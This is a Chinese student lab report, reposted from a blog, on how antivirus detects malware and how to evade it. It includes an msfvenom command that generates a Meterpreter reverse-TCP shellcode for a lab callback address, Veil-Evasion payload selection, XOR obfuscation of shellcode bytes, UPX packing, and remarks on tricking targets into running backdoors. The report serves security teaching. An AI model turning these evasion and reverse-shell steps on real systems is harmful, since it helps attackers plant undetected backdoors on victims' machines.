基礎知識

• 如何檢測出惡意代碼
  • 基于特征碼的檢測：分析指令的統(tǒng)計特性、代碼的結構特性等。如果一個可執(zhí)行文件（或其他運行的庫、腳本等）擁有一般惡意代碼所通有的特征（開啟后門等）則被認為是惡意代碼
  • 啟發(fā)式惡意軟件檢測：構成惡意代碼的指令的含義，根據(jù)些片面特征去推斷。
  • 基于行為的動態(tài)分析檢測：通過監(jiān)視惡意代碼運行過程。如利用系統(tǒng)監(jiān)視工具觀察惡意代碼運行過程時系統(tǒng)環(huán)境的變化，或通過跟蹤惡意代碼執(zhí)行過程使用的系統(tǒng)函數(shù)和指令特征分析惡意代碼功能，如出現(xiàn)惡意行為，則屬于惡意代碼。
• 什么是免殺及如何進行免殺
  • 免殺，字面意思上理解，就是“反-殺毒”，也就是通過一定的手段，使得殺毒工具無法檢測出來軟件病毒或者木馬之類的“干擾性”特征。免殺的方法包括：
  • 修改特征碼：用一些工具找出特征碼并針對特征碼做免殺處理。
    • 文件加殼：可以用一些比較生僻的殼對木馬文件進行保護，阻止外部程序或軟件對加殼程序的反匯編分析或者動態(tài)分析。
    • 在有shellcode的情況下，用encode進行編碼，payload重新編譯生成可執(zhí)行文件
• 改變行為
  • 通訊方式
    • 盡量使用反彈式連接
    • 使用隧道技術
    • 加密通訊數(shù)據(jù)
  • 操作模式
    • 基于內存操作
    • 減少對系統(tǒng)的修改
    • 加入混淆作用的正常功能代碼
• 非常規(guī)方法
  • 使用一個有漏洞的應用當成后門，編寫攻擊代碼集成到如MSF中。
  • 使用社工類攻擊，誘騙目標關閉AV軟件。
  • 純手工打造一個惡意軟件

實驗過程

Msfvenom使用編碼器

檢測上節(jié)課利用Msfvenom生成的后門軟件，事實證明Metaspliot作為做熱門的平臺之一，各AV廠商都有所防范。

多編碼幾次也沒有明顯效果。

事實上殺毒軟件廠商在對特征碼進行掃描的同時，也會對編碼器所用的解碼代碼進行檢索，像我們之前常用的比較有名的編碼器早已經(jīng)被殺軟廠商們加入了黑名單，所以使用該編碼器即使編碼次數(shù)再多也不會起到實質性效果。

?

采用免殺平臺Veil-Evasion生成后門軟件

?這次使用免殺功能更強一點的一款平臺Veil-Evasion

• 按照其提示，輸入list查看payload，選擇能實現(xiàn)反彈端口連接的payload（一般看名字就能看出來，rev_tcp，rev_http結尾的一般都是）這次我們隨便選擇其中滿足我們要求的payload，鍵入use + name of payload（截圖的時候我選擇的是ruby/meterpreter/rev_tcp但是生成的時候一直彈出payload有問題，所以實際上使用的是python/meterpreter/rev_tcp）

• 將.exe文件拷貝出來到靶機上，結果被查殺

• 在網(wǎng)站上進行檢測

• veil-evasion平臺如此強大？

C語言調用Shellcode

• 用指令會生成一個c語言格式的Shellcode數(shù)組。指令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.30 LPORT=443 -f c

• 用Microsoft Visual Studio 2013或者Visual C++ 6.0進行編譯運行生成可執(zhí)行文件。

• ?

• ?

• 順利回連

• 用VirSCAN.org進行檢測
  

修改shellcode

• 用指令生成的shellcode數(shù)組，仍是會被發(fā)現(xiàn)，所以我們可以對這個數(shù)組做一些變化，比如對奇偶位分別進行異或：

奇數(shù)位異或85，即01010101 偶數(shù)位異或170，即10101010

將原數(shù)組的內容進行改變，這樣在殺軟檢查時被發(fā)現(xiàn)的幾率就減小了

• kali成功獲取權限

UPX加殼

?

用下面的命令來加壓縮殼

# upx 4320-1.exe -o 4320m.exe

·
效果并不是很好

離實戰(zhàn)還缺些什么技術或步驟

• • 最關鍵的部分實在傳播環(huán)節(jié)，實驗中實在關閉防火墻的情況下將后門程序傳至靶機中，現(xiàn)實中一般普通的個人計算機都會打開防火墻，更不用說涉密計算機，也正因如此，確認下載網(wǎng)站的安全性是相當重要的，如果主動選擇了忽略就等于讓對方輕而易舉地突破了這一關鍵環(huán)節(jié)。
  • 其次，在實驗中都是靶機主動完成回連，通過一定的偽裝和誘導讓被攻擊者打開后門程序才是更高級和更現(xiàn)實的方法。

  • ?

轉載于:https://www.cnblogs.com/4320-lc/p/8728573.html

總結

以上是生活随笔為你收集整理的Exp3 免杀原理与实践 20154320 李超的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯，歡迎將生活随笔推薦給好友。